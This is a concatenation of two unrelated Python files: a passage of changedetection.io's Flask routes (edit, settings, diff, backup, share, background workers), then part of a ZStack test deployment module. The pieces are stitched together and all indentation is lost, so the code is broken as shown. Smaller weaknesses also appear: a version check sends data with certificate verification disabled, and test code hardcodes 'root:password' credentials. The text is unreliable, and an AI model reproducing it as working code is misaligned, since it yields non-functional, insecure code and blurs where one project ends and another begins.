extra_update_obj['previous_md5'] = get_current_checksum_include_ignore_text(uuid=uuid)
# Be sure proxy value is None
if datastore.proxy_list is not None and form.data['proxy'] == '':
extra_update_obj['proxy'] = None
datastore.data['watching'][uuid].update(form.data)
datastore.data['watching'][uuid].update(extra_update_obj)
flash("Updated watch.")
# Re #286 - We wait for syncing new data to disk in another thread every 60 seconds
# But in the case something is added we should save straight away
datastore.needs_write_urgent = True
# Queue the watch for immediate recheck
update_q.put(uuid)
# Diff page [edit] link should go back to diff page
if request.args.get("next") and request.args.get("next") == 'diff' and not form.save_and_preview_button.data:
return redirect(url_for('diff_history_page', uuid=uuid))
else:
if form.save_and_preview_button.data:
flash('You may need to reload this page to see the new content.')
return redirect(url_for('preview_page', uuid=uuid))
else:
return redirect(url_for('index'))
else:
if request.method == 'POST' and not form.validate():
flash("An error occurred, please see below.", "error")
visualselector_data_is_ready = datastore.visualselector_data_is_ready(uuid)
# Only works reliably with Playwright
visualselector_enabled = os.getenv('PLAYWRIGHT_DRIVER_URL', False) and default['fetch_backend'] == 'html_webdriver'
output = render_template("edit.html",
uuid=uuid,
watch=datastore.data['watching'][uuid],
form=form,
has_empty_checktime=using_default_check_time,
using_global_webdriver_wait=default['webdriver_delay'] is None,
current_base_url=datastore.data['settings']['application']['base_url'],
emailprefix=os.getenv('NOTIFICATION_MAIL_BUTTON_PREFIX', False),
visualselector_data_is_ready=visualselector_data_is_ready,
visualselector_enabled=visualselector_enabled
)
return output
@app.route("/settings", methods=['GET', "POST"])
@login_required
def settings_page():
from changedetectionio import content_fetcher, forms
default = deepcopy(datastore.data['settings'])
if datastore.proxy_list is not None:
# When enabled
system_proxy = datastore.data['settings']['requests']['proxy']
# In the case it doesnt exist anymore
if not any([system_proxy in tup for tup in datastore.proxy_list]):
system_proxy = None
default['requests']['proxy'] = system_proxy if system_proxy is not None else datastore.proxy_list[0][0]
# Used by the form handler to keep or remove the proxy settings
default['proxy_list'] = datastore.proxy_list
# Don't use form.data on POST so that it doesnt overrid the checkbox status from the POST status
form = forms.globalSettingsForm(formdata=request.form if request.method == 'POST' else None,
data=default
)
if datastore.proxy_list is None:
# @todo - Couldn't get setattr() etc dynamic addition working, so remove it instead
del form.requests.form.proxy
else:
form.requests.form.proxy.choices = datastore.proxy_list
if request.method == 'POST':
# Password unset is a GET, but we can lock the session to a salted env password to always need the password
if form.application.form.data.get('removepassword_button', False):
# SALTED_PASS means the password is "locked" to what we set in the Env var
if not os.getenv("SALTED_PASS", False):
datastore.remove_password()
flash("Password protection removed.", 'notice')
flask_login.logout_user()
return redirect(url_for('settings_page'))
if form.validate():
datastore.data['settings']['application'].update(form.data['application'])
datastore.data['settings']['requests'].update(form.data['requests'])
if not os.getenv("SALTED_PASS", False) and len(form.application.form.password.encrypted_password):
datastore.data['settings']['application']['password'] = form.application.form.password.encrypted_password
datastore.needs_write_urgent = True
flash("Password protection enabled.", 'notice')
flask_login.logout_user()
return redirect(url_for('index'))
datastore.needs_write_urgent = True
flash("Settings updated.")
else:
flash("An error occurred, please see below.", "error")
output = render_template("settings.html",
form=form,
current_base_url = datastore.data['settings']['application']['base_url'],
hide_remove_pass=os.getenv("SALTED_PASS", False),
api_key=datastore.data['settings']['application'].get('api_access_token'),
emailprefix=os.getenv('NOTIFICATION_MAIL_BUTTON_PREFIX', False))
return output
@app.route("/import", methods=['GET', "POST"])
@login_required
def import_page():
remaining_urls = []
if request.method == 'POST':
from .importer import import_url_list, import_distill_io_json
# URL List import
if request.values.get('urls') and len(request.values.get('urls').strip()):
# Import and push into the queue for immediate update check
importer = import_url_list()
importer.run(data=request.values.get('urls'), flash=flash, datastore=datastore)
for uuid in importer.new_uuids:
update_q.put(uuid)
if len(importer.remaining_data) == 0:
return redirect(url_for('index'))
else:
remaining_urls = importer.remaining_data
# Distill.io import
if request.values.get('distill-io') and len(request.values.get('distill-io').strip()):
# Import and push into the queue for immediate update check
d_importer = import_distill_io_json()
d_importer.run(data=request.values.get('distill-io'), flash=flash, datastore=datastore)
for uuid in d_importer.new_uuids:
update_q.put(uuid)
# Could be some remaining, or we could be on GET
output = render_template("import.html",
import_url_list_remaining="\n".join(remaining_urls),
original_distill_json=''
)
return output
# Clear all statuses, so we do not see the 'unviewed' class
@app.route("/form/mark-all-viewed", methods=['GET'])
@login_required
def mark_all_viewed():
# Save the current newest history as the most recently viewed
for watch_uuid, watch in datastore.data['watching'].items():
datastore.set_last_viewed(watch_uuid, int(time.time()))
return redirect(url_for('index'))
@app.route("/diff/<string:uuid>", methods=['GET'])
@login_required
def diff_history_page(uuid):
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
extra_stylesheets = [url_for('static_content', group='styles', filename='diff.css')]
try:
watch = datastore.data['watching'][uuid]
except KeyError:
flash("No history found for the specified link, bad link?", "error")
return redirect(url_for('index'))
history = watch.history
dates = list(history.keys())
if len(dates) < 2:
flash("Not enough saved change detection snapshots to produce a report.", "error")
return redirect(url_for('index'))
# Save the current newest history as the most recently viewed
datastore.set_last_viewed(uuid, time.time())
newest_file = history[dates[-1]]
try:
with open(newest_file, 'r') as f:
newest_version_file_contents = f.read()
except Exception as e:
newest_version_file_contents = "Unable to read {}.\n".format(newest_file)
previous_version = request.args.get('previous_version')
try:
previous_file = history[previous_version]
except KeyError:
# Not present, use a default value, the second one in the sorted list.
previous_file = history[dates[-2]]
try:
with open(previous_file, 'r') as f:
previous_version_file_contents = f.read()
except Exception as e:
previous_version_file_contents = "Unable to read {}.\n".format(previous_file)
screenshot_url = datastore.get_screenshot(uuid)
system_uses_webdriver = datastore.data['settings']['application']['fetch_backend'] == 'html_webdriver'
is_html_webdriver = True if watch.get('fetch_backend') == 'html_webdriver' or (
watch.get('fetch_backend', None) is None and system_uses_webdriver) else False
output = render_template("diff.html",
watch_a=watch,
newest=newest_version_file_contents,
previous=previous_version_file_contents,
extra_stylesheets=extra_stylesheets,
versions=dates[1:],
uuid=uuid,
newest_version_timestamp=dates[-1],
current_previous_version=str(previous_version),
current_diff_url=watch['url'],
extra_title=" - Diff - {}".format(watch['title'] if watch['title'] else watch['url']),
left_sticky=True,
screenshot=screenshot_url,
is_html_webdriver=is_html_webdriver)
return output
@app.route("/preview/<string:uuid>", methods=['GET'])
@login_required
def preview_page(uuid):
content = []
ignored_line_numbers = []
trigger_line_numbers = []
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
extra_stylesheets = [url_for('static_content', group='styles', filename='diff.css')]
try:
watch = datastore.data['watching'][uuid]
except KeyError:
flash("No history found for the specified link, bad link?", "error")
return redirect(url_for('index'))
if watch.history_n >0:
timestamps = sorted(watch.history.keys(), key=lambda x: int(x))
filename = watch.history[timestamps[-1]]
try:
with open(filename, 'r') as f:
tmp = f.readlines()
# Get what needs to be highlighted
ignore_rules = watch.get('ignore_text', []) + datastore.data['settings']['application']['global_ignore_text']
# .readlines will keep the \n, but we will parse it here again, in the future tidy this up
ignored_line_numbers = html_tools.strip_ignore_text(content="".join(tmp),
wordlist=ignore_rules,
mode='line numbers'
)
trigger_line_numbers = html_tools.strip_ignore_text(content="".join(tmp),
wordlist=watch['trigger_text'],
mode='line numbers'
)
# Prepare the classes and lines used in the template
i=0
for l in tmp:
classes=[]
i+=1
if i in ignored_line_numbers:
classes.append('ignored')
if i in trigger_line_numbers:
classes.append('triggered')
content.append({'line': l, 'classes': ' '.join(classes)})
except Exception as e:
content.append({'line': "File doesnt exist or unable to read file {}".format(filename), 'classes': ''})
else:
content.append({'line': "No history found", 'classes': ''})
screenshot_url = datastore.get_screenshot(uuid)
system_uses_webdriver = datastore.data['settings']['application']['fetch_backend'] == 'html_webdriver'
is_html_webdriver = True if watch.get('fetch_backend') == 'html_webdriver' or (
watch.get('fetch_backend', None) is None and system_uses_webdriver) else False
output = render_template("preview.html",
content=content,
extra_stylesheets=extra_stylesheets,
ignored_line_numbers=ignored_line_numbers,
triggered_line_numbers=trigger_line_numbers,
current_diff_url=watch['url'],
screenshot=screenshot_url,
watch=watch,
uuid=uuid,
is_html_webdriver=is_html_webdriver)
return output
@app.route("/settings/notification-logs", methods=['GET'])
@login_required
def notification_logs():
global notification_debug_log
output = render_template("notification-log.html",
logs=notification_debug_log if len(notification_debug_log) else ["No errors or warnings detected"])
return output
@app.route("/favicon.ico", methods=['GET'])
def favicon():
return send_from_directory("static/images", path="favicon.ico")
# We're good but backups are even better!
@app.route("/backup", methods=['GET'])
@login_required
def get_backup():
import zipfile
from pathlib import Path
# Remove any existing backup file, for now we just keep one file
for previous_backup_filename in Path(datastore_o.datastore_path).rglob('changedetection-backup-*.zip'):
os.unlink(previous_backup_filename)
# create a ZipFile object
backupname = "changedetection-backup-{}.zip".format(int(time.time()))
# We only care about UUIDS from the current index file
uuids = list(datastore.data['watching'].keys())
backup_filepath = os.path.join(datastore_o.datastore_path, backupname)
with zipfile.ZipFile(backup_filepath, "w",
compression=zipfile.ZIP_DEFLATED,
compresslevel=8) as zipObj:
# Be sure we're written fresh
datastore.sync_to_json()
# Add the index
zipObj.write(os.path.join(datastore_o.datastore_path, "url-watches.json"), arcname="url-watches.json")
# Add the flask app secret
zipObj.write(os.path.join(datastore_o.datastore_path, "secret.txt"), arcname="secret.txt")
# Add any snapshot data we find, use the full path to access the file, but make the file 'relative' in the Zip.
for txt_file_path in Path(datastore_o.datastore_path).rglob('*.txt'):
parent_p = txt_file_path.parent
if parent_p.name in uuids:
zipObj.write(txt_file_path,
arcname=str(txt_file_path).replace(datastore_o.datastore_path, ''),
compress_type=zipfile.ZIP_DEFLATED,
compresslevel=8)
# Create a list file with just the URLs, so it's easier to port somewhere else in the future
list_file = "url-list.txt"
with open(os.path.join(datastore_o.datastore_path, list_file), "w") as f:
for uuid in datastore.data["watching"]:
url = datastore.data["watching"][uuid]["url"]
f.write("{}\r\n".format(url))
list_with_tags_file = "url-list-with-tags.txt"
with open(
os.path.join(datastore_o.datastore_path, list_with_tags_file), "w"
) as f:
for uuid in datastore.data["watching"]:
url = datastore.data["watching"][uuid]["url"]
tag = datastore.data["watching"][uuid]["tag"]
f.write("{} {}\r\n".format(url, tag))
# Add it to the Zip
zipObj.write(
os.path.join(datastore_o.datastore_path, list_file),
arcname=list_file,
compress_type=zipfile.ZIP_DEFLATED,
compresslevel=8,
)
zipObj.write(
os.path.join(datastore_o.datastore_path, list_with_tags_file),
arcname=list_with_tags_file,
compress_type=zipfile.ZIP_DEFLATED,
compresslevel=8,
)
# Send_from_directory needs to be the full absolute path
return send_from_directory(os.path.abspath(datastore_o.datastore_path), backupname, as_attachment=True)
@app.route("/static/<string:group>/<string:filename>", methods=['GET'])
def static_content(group, filename):
from flask import make_response
if group == 'screenshot':
# Could be sensitive, follow password requirements
if datastore.data['settings']['application']['password'] and not flask_login.current_user.is_authenticated:
abort(403)
# These files should be in our subdirectory
try:
# set nocache, set content-type
watch_dir = datastore_o.datastore_path + "/" + filename
response = make_response(send_from_directory(filename="last-screenshot.png", directory=watch_dir, path=watch_dir + "/last-screenshot.png"))
response.headers['Content-type'] = 'image/png'
response.headers['Cache-Control'] = 'no-cache, no-store, must-revalidate'
response.headers['Pragma'] = 'no-cache'
response.headers['Expires'] = 0
return response
except FileNotFoundError:
abort(404)
if group == 'visual_selector_data':
# Could be sensitive, follow password requirements
if datastore.data['settings']['application']['password'] and not flask_login.current_user.is_authenticated:
abort(403)
# These files should be in our subdirectory
try:
# set nocache, set content-type
watch_dir = datastore_o.datastore_path + "/" + filename
response = make_response(send_from_directory(filename="elements.json", directory=watch_dir, path=watch_dir + "/elements.json"))
response.headers['Content-type'] = 'application/json'
response.headers['Cache-Control'] = 'no-cache, no-store, must-revalidate'
response.headers['Pragma'] = 'no-cache'
response.headers['Expires'] = 0
return response
except FileNotFoundError:
abort(404)
# These files should be in our subdirectory
try:
return send_from_directory("static/{}".format(group), path=filename)
except FileNotFoundError:
abort(404)
@app.route("/api/add", methods=['POST'])
@login_required
def form_watch_add():
from changedetectionio import forms
form = forms.quickWatchForm(request.form)
if not form.validate():
flash("Error")
return redirect(url_for('index'))
url = request.form.get('url').strip()
if datastore.url_exists(url):
flash('The URL {} already exists'.format(url), "error")
return redirect(url_for('index'))
# @todo add_watch should throw a custom Exception for validation etc
new_uuid = datastore.add_watch(url=url, tag=request.form.get('tag').strip())
if new_uuid:
# Straight into the queue.
update_q.put(new_uuid)
flash("Watch added.")
return redirect(url_for('index'))
@app.route("/api/delete", methods=['GET'])
@login_required
def form_delete():
uuid = request.args.get('uuid')
if uuid != 'all' and not uuid in datastore.data['watching'].keys():
flash('The watch by UUID {} does not exist.'.format(uuid), 'error')
return redirect(url_for('index'))
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
datastore.delete(uuid)
flash('Deleted.')
return redirect(url_for('index'))
@app.route("/api/clone", methods=['GET'])
@login_required
def form_clone():
uuid = request.args.get('uuid')
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
new_uuid = datastore.clone(uuid)
update_q.put(new_uuid)
flash('Cloned.')
return redirect(url_for('index'))
@app.route("/api/checknow", methods=['GET'])
@login_required
def form_watch_checknow():
tag = request.args.get('tag')
uuid = request.args.get('uuid')
i = 0
running_uuids = []
for t in running_update_threads:
running_uuids.append(t.current_uuid)
# @todo check thread is running and skip
if uuid:
if uuid not in running_uuids:
update_q.put(uuid)
i = 1
elif tag != None:
# Items that have this current tag
for watch_uuid, watch in datastore.data['watching'].items():
if (tag != None and tag in watch['tag']):
if watch_uuid not in running_uuids and not datastore.data['watching'][watch_uuid]['paused']:
update_q.put(watch_uuid)
i += 1
else:
# No tag, no uuid, add everything.
for watch_uuid, watch in datastore.data['watching'].items():
if watch_uuid not in running_uuids and not datastore.data['watching'][watch_uuid]['paused']:
update_q.put(watch_uuid)
i += 1
flash("{} watches are queued for rechecking.".format(i))
return redirect(url_for('index', tag=tag))
@app.route("/api/share-url", methods=['GET'])
@login_required
def form_share_put_watch():
"""Given a watch UUID, upload the info and return a share-link
the share-link can be imported/added"""
import requests
import json
tag = request.args.get('tag')
uuid = request.args.get('uuid')
# more for testing
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
# copy it to memory as trim off what we dont need (history)
watch = deepcopy(datastore.data['watching'][uuid])
# For older versions that are not a @property
if (watch.get('history')):
del (watch['history'])
# for safety/privacy
for k in list(watch.keys()):
if k.startswith('notification_'):
del watch[k]
for r in['uuid', 'last_checked', 'last_changed']:
if watch.get(r):
del (watch[r])
# Add the global stuff which may have an impact
watch['ignore_text'] += datastore.data['settings']['application']['global_ignore_text']
watch['subtractive_selectors'] += datastore.data['settings']['application']['global_subtractive_selectors']
watch_json = json.dumps(watch)
try:
r = requests.request(method="POST",
data={'watch': watch_json},
url="https://changedetection.io/share/share",
headers={'App-Guid': datastore.data['app_guid']})
res = r.json()
session['share-link'] = "https://changedetection.io/share/{}".format(res['share_key'])
except Exception as e:
logging.error("Error sharing -{}".format(str(e)))
flash("Could not share, something went wrong while communicating with the share server - {}".format(str(e)), 'error')
# https://changedetection.io/share/VrMv05wpXyQa
# in the browser - should give you a nice info page - wtf
# paste in etc
return redirect(url_for('index'))
# @todo handle ctrl break
ticker_thread = threading.Thread(target=ticker_thread_check_time_launch_checks).start()
threading.Thread(target=notification_runner).start()
# Check for new release version, but not when running in test/build
if not os.getenv("GITHUB_REF", False):
threading.Thread(target=check_for_new_version).start()
return app
# Check for new version and anonymous stats
def check_for_new_version():
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
while not app.config.exit.is_set():
try:
r = requests.post("https://changedetection.io/check-ver.php",
data={'version': __version__,
'app_guid': datastore.data['app_guid'],
'watch_count': len(datastore.data['watching'])
},
verify=False)
except:
pass
try:
if "new_version" in r.text:
app.config['NEW_VERSION_AVAILABLE'] = True
except:
pass
# Check daily
app.config.exit.wait(86400)
def notification_runner():
global notification_debug_log
while not app.config.exit.is_set():
try:
# At the moment only one thread runs (single runner)
n_object = notification_q.get(block=False)
except queue.Empty:
time.sleep(1)
else:
# Process notifications
try:
from changedetectionio import notification
notification.process_notification(n_object, datastore)
except Exception as e:
logging.error("Watch URL: {} Error {}".format(n_object['watch_url'], str(e)))
# UUID wont be present when we submit a 'test' from the global settings
if 'uuid' in n_object:
datastore.update_watch(uuid=n_object['uuid'],
update_obj={'last_notification_error': "Notification error detected, please see logs."})
log_lines = str(e).splitlines()
notification_debug_log += log_lines
# Trim the log length
notification_debug_log = notification_debug_log[-100:]
# Thread runner to check every minute, look for new watches to feed into the Queue.
def ticker_thread_check_time_launch_checks():
from changedetectionio import update_worker
import logging
# Spin up Workers that do the fetching
# Can be overriden by ENV or use the default settings
n_workers = int(os.getenv("FETCH_WORKERS", datastore.data['settings']['requests']['workers']))
for _ in range(n_workers):
new_worker = update_worker.update_worker(update_q, notification_q, app, datastore)
running_update_threads.append(new_worker)
new_worker.start()
while not app.config.exit.is_set():
# Get a list of watches by UUID that are currently fetching data
running_uuids = []
for t in running_update_threads:
if t.current_uuid:
running_uuids.append(t.current_uuid)
# Re #232 - Deepcopy the data incase it changes while we're iterating through it all
watch_uuid_list = []
while True:
try:
watch_uuid_list = datastore.data['watching'].keys()
except RuntimeError as e:
# RuntimeError: dictionary changed size during iteration
time.sleep(0.1)
else:
break
# Re #438 - Don't place more watches in the queue to be checked if the queue is already large
while update_q.qsize() >= 2000:
time.sleep(1)
# Check for watches outside of the time threshold to put in the thread queue.
now = time.time()
recheck_time_minimum_seconds = int(os.getenv('MINIMUM_SECONDS_RECHECK_TIME', 60))
recheck_time_system_seconds = datastore.threshold_seconds
for uuid in watch_uuid_list:
watch = datastore.data['watching'].get(uuid)
if not watch:
logging.error("Watch: {} no longer present.".format(uuid))
continue
# No need todo further processing if it's paused
if watch['paused']:
continue
# If they supplied an individual entry minutes to threshold.
threshold = now
watch_threshold_seconds = watch.threshold_seconds()
if watch_threshold_seconds:
threshold -= watch_threshold_seconds
else:
threshold -= recheck_time_system_seconds
# Yeah, put it in the queue, it's more than time
if watch['last_checked'] <= max(threshold, recheck_time_minimum_seconds):
if not uuid in running_uuids and uuid not in update_q.queue:
update_q.put(uuid)
# Wait a few seconds before checking the list again
time.sleep(3)
# Should be low so we can break this out in testing
app.config.exit.wait(1)
|
deploy_operations.py
|
'''
deploy operations for setup zstack database.
@author: Youyk
'''
import zstackwoodpecker.test_util as test_util
import apibinding.api_actions as api_actions
import account_operations
import resource_operations as res_ops
import zstacklib.utils.sizeunit as sizeunit
import zstacklib.utils.jsonobject as jsonobject
import zstacklib.utils.xmlobject as xmlobject
import zstacklib.utils.lock as lock
import apibinding.inventory as inventory
import os
import sys
import traceback
import threading
import time
#global exception information for thread usage
exc_info = []
AddKVMHostTimeOut = 10*60*1000
IMAGE_THREAD_LIMIT = 2
DEPLOY_THREAD_LIMIT = 500
def get_first_item_from_list(list_obj, list_obj_name, list_obj_value, action_name):
'''
Judge if list is empty. If not, return the 1st item.
list_obj: the list for judgment and return;
list_obj_name: the list item type name;
list_obj_value: the list item's value when do previous query;
action_name: which action is calling this function
'''
if not isinstance(list_obj, list):
raise test_util.TestError("The first parameter is not a [list] type")
if not list_obj:
raise test_util.TestError("Did not find %s: [%s], when adding %s" % (list_obj_name, list_obj_value, action_name))
if len(list_obj) > 1:
raise test_util.TestError("Find more than 1 [%s] resource with name: [%s], when adding %s. Please check your deploy.xml and make sure resource do NOT have duplicated name " % (list_obj_name, list_obj_value, action_name))
return list_obj[0]
def get_ceph_storages_mon_nic_id(ceph_name, scenario_config):
for host in xmlobject.safe_list(scenario_config.deployerConfig.hosts.host):
for vm in xmlobject.safe_list(host.vms.vm):
nic_id = 0
for l3network in xmlobject.safe_list(vm.l3Networks.l3Network):
if hasattr(l3network, 'backupStorageRef') and hasattr(l3network.backupStorageRef, 'monIp_') and l3network.backupStorageRef.text_ == ceph_name:
return nic_id
if hasattr(l3network, 'primaryStorageRef') and hasattr(l3network.primaryStorageRef, 'monIp_') and l3network.primaryStorageRef.text_ == ceph_name:
return nic_id
nic_id += 1
for host in xmlobject.safe_list(scenario_config.deployerConfig.hosts.host):
for vm in xmlobject.safe_list(host.vms.vm):
nic_id = 0
for l3network in xmlobject.safe_list(vm.l3Networks.l3Network):
if hasattr(l3network, 'backupStorageRef') and l3network.backupStorageRef.text_ == ceph_name:
return nic_id
if hasattr(l3network, 'primaryStorageRef') and l3network.primaryStorageRef.text_ == ceph_name:
return nic_id
nic_id += 1
return None
def get_backup_storage_from_scenario_file(backupStorageRefName, scenarioConfig, scenarioFile, deployConfig):
if scenarioConfig == None or scenarioFile == None or not os.path.exists(scenarioFile):
return []
import scenario_operations as sce_ops
zstack_management_ip = scenarioConfig.basicConfig.zstackManagementIp.text_
ip_list = []
for host in xmlobject.safe_list(scenarioConfig.deployerConfig.hosts.host):
for vm in xmlobject.safe_list(host.vms.vm):
if xmlobject.has_element(vm, 'backupStorageRef'):
if backupStorageRefName == vm.backupStorageRef.text_:
with open(scenarioFile, 'r') as fd:
xmlstr = fd.read()
fd.close()
scenario_file = xmlobject.loads(xmlstr)
for s_vm in xmlobject.safe_list(scenario_file.vms.vm):
if s_vm.name_ == vm.name_:
if vm.backupStorageRef.type_ == 'ceph':
nic_id = get_ceph_storages_mon_nic_id(vm.backupStorageRef.text_, scenarioConfig)
if nic_id == None:
ip_list.append(s_vm.ip_)
else:
ip_list.append(s_vm.ips.ip[nic_id].ip_)
else:
for l3Network in xmlobject.safe_list(vm.l3Networks.l3Network):
if xmlobject.has_element(l3Network, 'backupStorageRef') and backupStorageRefName in [ backupStorageRef.text_ for backupStorageRef in l3Network.backupStorageRef]:
#if xmlobject.has_element(l3Network, 'backupStorageRef') and l3Network.backupStorageRef.text_ == backupStorageRefName:
cond = res_ops.gen_query_conditions('name', '=', vm.name_)
vm_inv_nics = sce_ops.query_resource(zstack_management_ip, res_ops.VM_INSTANCE, cond).inventories[0].vmNics
for vm_inv_nic in vm_inv_nics:
if vm_inv_nic.l3NetworkUuid == l3Network.uuid_:
ip_list.append(vm_inv_nic.ip)
return ip_list
#ip_list.append(s_vm.ip_)
return ip_list
#Add Backup Storage
def add_backup_storage(scenarioConfig, scenarioFile, deployConfig, session_uuid):
if xmlobject.has_element(deployConfig, 'backupStorages.sftpBackupStorage'):
for bs in xmlobject.safe_list(deployConfig.backupStorages.sftpBackupStorage):
action = api_actions.AddSftpBackupStorageAction()
action.sessionUuid = session_uuid
action.name = bs.name_
action.description = bs.description__
action.url = bs.url_
action.username = bs.username_
action.password = bs.password_
hostname_list = get_backup_storage_from_scenario_file(bs.name_, scenarioConfig, scenarioFile, deployConfig)
if len(hostname_list) == 0:
action.hostname = bs.hostname_
else:
action.hostname = hostname_list[0]
if hasattr(bs, 'port_'):
action.port = bs.port_
action.sshport = bs.port_
action.sshPort = bs.port_
action.timeout = AddKVMHostTimeOut #for some platform slowly salt execution
action.type = inventory.SFTP_BACKUP_STORAGE_TYPE
thread = threading.Thread(target = _thread_for_action, args = (action, ))
wait_for_thread_queue()
thread.start()
if xmlobject.has_element(deployConfig, 'backupStorages.imageStoreBackupStorage'):
for bs in xmlobject.safe_list(deployConfig.backupStorages.imageStoreBackupStorage):
action = api_actions.AddImageStoreBackupStorageAction()
action.sessionUuid = session_uuid
action.name = bs.name_
action.description = bs.description__
action.url = bs.url_
action.username = bs.username_
action.password = bs.password_
hostname_list = get_backup_storage_from_scenario_file(bs.name_, scenarioConfig, scenarioFile, deployConfig)
if len(hostname_list) == 0:
action.hostname = bs.hostname_
else:
action.hostname = hostname_list[0]
if hasattr(bs, 'port_'):
action.port = bs.port_
action.sshport = bs.port_
action.sshPort = bs.port_
action.timeout = AddKVMHostTimeOut #for some platform slowly salt execution
action.type = inventory.IMAGE_STORE_BACKUP_STORAGE_TYPE
thread = threading.Thread(target = _thread_for_action, args = (action, ))
wait_for_thread_queue()
thread.start()
if xmlobject.has_element(deployConfig, 'backupStorages.cephBackupStorage'):
for bs in xmlobject.safe_list(deployConfig.backupStorages.cephBackupStorage):
action = api_actions.AddCephBackupStorageAction()
action.sessionUuid = session_uuid
action.name = bs.name_
action.description = bs.description__
hostname_list = get_backup_storage_from_scenario_file(bs.name_, scenarioConfig, scenarioFile, deployConfig)
if len(hostname_list) != 0:
# TODO: username and password should be configarable
action.monUrls = []
for hostname in hostname_list:
action.monUrls.append("root:password@%s" % (hostname))
else:
action.monUrls = bs.monUrls_.split(';')
if bs.poolName__:
action.poolName = bs.poolName_
action.timeout = AddKVMHostTimeOut #for some platform slowly salt execution
action.type = inventory.CEPH_BACKUP_STORAGE_TYPE
thread = threading.Thread(target = _thread_for_action, args = (action, ))
wait_for_thread_queue()
thread.start()
if xmlobject.has_element(deployConfig, 'backupStorages.xskyBackupStorage'):
for bs in xmlobject.safe_list(deployConfig.backupStorages.xskyBackupStorage):
action = api_actions.AddCephBackupStorageAction()
action.sessionUuid = session_uuid
action.name = bs.name_
action.description = bs.description__
hostname_list = get_backup_storage_from_scenario_file(bs.name_, scenarioConfig, scenarioFile, deployConfig)
if len(hostname_list) != 0:
# TODO: username and password should be configarable
action.monUrls = []
for hostname in hostname_list:
action.monUrls.append("root:password@%s" % (hostname))
else:
if bs.monUrls_.find(';') == -1:
action.monUrls = [bs.monUrls_]
else:
action.monUrls = bs.monUrls_.split(';')
if bs.poolName__:
action.poolName = bs.poolName_
action.timeout = AddKVMHostTimeOut #for some platform slowly salt execution
action.type = inventory.CEPH_BACKUP_STORAGE_TYPE
thread = threading.Thread(target = _thread_for_action, args = (action, ))
wait_for_thread_queue()
thread.start()
if xmlobject.has_element(deployConfig, 'backupStorages.fusionstorBackupStorage'):
for bs in xmlobject.safe_list(deployConfig.backupStorages.fusionstorBackupStorage):
action = api_actions.AddFusionstorBackupStorageAction()
action.sessionUuid = session_uuid
action.name = bs.name_
action.description = bs.description__
hostname_list = get_backup_storage_from_scenario_file(bs.name_, scenarioConfig, scenarioFile, deployConfig)
if len(hostname_list) != 0:
# TODO: username and password should be configarable
action.monUrls = []
for hostname in hostname_list:
action.monUrls.append("root:password@%s" % (hostname))
else:
action.monUrls = bs.monUrls_.split(';')
if bs.poolName__:
action.poolName = bs.poolName_
action.timeout = AddKVMHostTimeOut #for some platform slowly salt execution
action.type = inventory.FUSIONSTOR_BACKUP_STORAGE_TYPE
thread = threading.Thread(target = _thread_for_action, args = (action, ))
wait_for_thread_queue()
thread.start()
if xmlobject.has_element(deployConfig, 'backupStorages.simulatorBackupStorage'):
for bs in xmlobject.safe_list(deployConfig.backupStorages.simulatorBackupStorage):
action = api_actions.AddSimulatorBackupStorageAction()
action.sessionUuid = session_uuid
action.name = bs.name_
action.description = bs.description__
action.url = bs.url_
action.type = inventory.SIMULATOR_BACKUP_STORAGE_TYPE
action.totalCapacity = sizeunit.get_size(bs.totalCapacity_)
action.availableCapacity = sizeunit.get_size(bs.availableCapacity_)
thread = threading.Thread(target = _thread_for_action, args = (action, ))
wait_for_thread_queue()
thread.start()
wait_for_thread_done()
#Add Zones
def add_zone(scenarioConfig, scenarioFile, deployConfig, session_uuid, zone_name = None):
def _add_zone(zone, zone_duplication):
action = api_actions.CreateZoneAction()
action.sessionUuid = session_uuid
if zone_duplication == 0:
action.name = zone.name_
action.description = zone.description__
else:
action.name = generate_dup_name(zone.name_, zone_duplication, 'z')
action.description = generate_dup_name(zone.description__, zone_duplication, 'zone')
try:
evt = action.run()
test_util.test_logger(jsonobject.dumps(evt))
zinv = evt.inventory
except:
exc_info.append(sys.exc_info())
if xmlobject.has_element(zone, 'backupStorageRef'):
for ref in xmlobject.safe_list(zone.backupStorageRef):
bss = res_ops.get_resource(res_ops.BACKUP_STORAGE, session_uuid, name=ref.text_)
bs = get_first_item_from_list(bss, 'Backup Storage', ref.text_, 'attach backup storage to zone')
action = api_actions.AttachBackupStorageToZoneAction()
action.sessionUuid = session_uuid
action.backupStorageUuid = bs.uuid
action.zoneUuid = zinv.uuid
try:
evt = action.run()
test_util.test_logger(jsonobject.dumps(evt))
except:
exc_info.append(sys.exc_info())
if not xmlobject.has_element(deployConfig, 'zones.zone'):
return
for zone in xmlobject.safe_list(deployConfig.zones.zone):
if zone_name and zone_name != zone.name_:
continue
if zone.duplication__ == None:
duplication = 1
else:
duplication = int(zone.duplication__)
for i in range(duplication):
thread = threading.Thread(target=_add_zone, args=(zone, i, ))
wait_for_thread_queue()
thread.start()
wait_for_thread_done()
#Add L2 network
def add_l2_network(scenarioConfig, scenarioFile, deployConfig, session_uuid, l2_name = None, zone_name = None):
'''
If providing name, it will only add L2 network with the same name.
'''
if not xmlobject.has_element(deployConfig, "zones.zone"):
return
def _deploy_l2_vxlan_network(zone):
if not xmlobject.has_element(deployConfig, "l2VxlanNetworkPools"):
return
for l2pool in xmlobject.safe_list(deployConfig.l2VxlanNetworkPools.l2VxlanNetworkPool):
zinvs = res_ops.get_resource(res_ops.ZONE, session_uuid, name=zone.name_)
zinv = get_first_item_from_list(zinvs, 'Zone', zone.name_, 'L2 network')
action = api_actions.CreateL2VxlanNetworkPoolAction()
action.name = l2pool.name_
action.zoneUuid = zinv.uuid
action.sessionUuid = session_uuid
poolinv = action.run().inventory
for vnirange in xmlobject.safe_list(l2pool.vniRanges.vniRange):
action = api_actions.CreateVniRangeAction()
action.name = vnirange.name_
action.startVni = vnirange.startVni_
action.endVni = vnirange.endVni_
action.l2NetworkUuid = poolinv.uuid
action.sessionUuid = session_uuid
evt = action.run()
def _deploy_l2_network(zone, is_vlan):
if is_vlan:
if not xmlobject.has_element(zone, "l2Networks.l2VlanNetwork"):
return
